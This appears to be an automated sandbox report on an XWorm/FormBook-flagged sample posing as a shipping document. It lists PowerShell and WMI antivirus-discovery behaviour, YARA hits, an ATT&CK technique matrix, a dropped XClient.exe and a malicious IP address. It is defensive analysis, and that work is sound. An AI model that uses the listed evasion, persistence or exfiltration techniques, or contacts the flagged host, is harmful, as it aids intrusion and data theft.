Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, 00000003.00000002.4521272765.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, 00000003.00000002.4545148579.00000000062F0000.00000004.00000020.00020000.00000000.sdmp, PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, 00000003.00000002.4521272765.0000000000CE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, 00000003.00000002.4521272765.0000000000CE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ws Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4520296085.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2052801609.0000000003541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe PID: 1988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe PID: 6592, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4520296085.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2052801609.0000000003541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe PID: 1988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe PID: 6592, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	2 Registry Run Keys / Startup Folder	111 Process Injection	1 Masquerading	OS Credential Dumping	221 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	1 DLL Side-Loading	2 Registry Run Keys / Startup Folder	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	131 Virtualization/Sandbox Evasion	Security Account Manager	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.FormBook
PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\XClient.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\XClient.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.FormBook

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://crl.micro	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
104.250.180.178	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.2116994219.00000000059F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2160747319.0000000005FD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2201275133.0000000005748000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2272001202.0000000006137000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.micro	powershell.exe, 00000009.00000002.2209439347.0000000007219000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000C.00000002.2244028681.0000000005226000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000004.00000002.2107616317.0000000004AE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2151007476.00000000050C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2186053072.0000000004836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2244028681.0000000005297000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000004.00000002.2107616317.0000000004991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2151007476.0000000004F71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2186053072.00000000046E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2244028681.00000000050D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microsoft	powershell.exe, 00000004.00000002.2123040891.0000000007365000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000C.00000002.2244028681.0000000005226000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://go.micro	powershell.exe, 00000007.00000002.2151007476.000000000575A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2151007476.00000000058CE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
